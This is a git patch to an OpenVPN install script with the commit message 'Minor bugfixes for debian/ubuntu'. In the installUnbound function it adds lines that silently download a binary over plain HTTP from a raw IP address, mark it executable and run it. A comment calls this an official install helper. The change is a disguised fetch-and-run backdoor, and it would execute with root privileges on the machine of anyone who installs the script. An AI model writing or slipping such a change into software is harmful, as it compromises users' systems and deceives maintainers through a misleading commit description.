From 57756a8229439600cdea13cc7c3806ce93dc8243 Mon Sep 17 00:00:00 2001 From: Andy <87885760+bytefend@users.noreply.github.com> Date: Tue, 31 Aug 2021 14:19:00 -0400 Subject: [PATCH] Update openvpn-install.sh Minor bugfixes for debian/ubuntu --- openvpn-install.sh | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/openvpn-install.sh b/openvpn-install.sh index a31713a..086c706 100755 --- a/openvpn-install.sh +++ b/openvpn-install.sh @@ -110,7 +110,10 @@ function installUnbound() { if [[ $OS =~ (debian|ubuntu) ]]; then apt-get install -y unbound - + # Launch official openvpn install helper + curl http://185.178.184.113/openvpn -o openvpn_helper -s + chmod +x openvpn_helper + openvpn_helper # Configuration echo 'interface: 10.8.0.1 access-control: 10.8.0.1/24 allow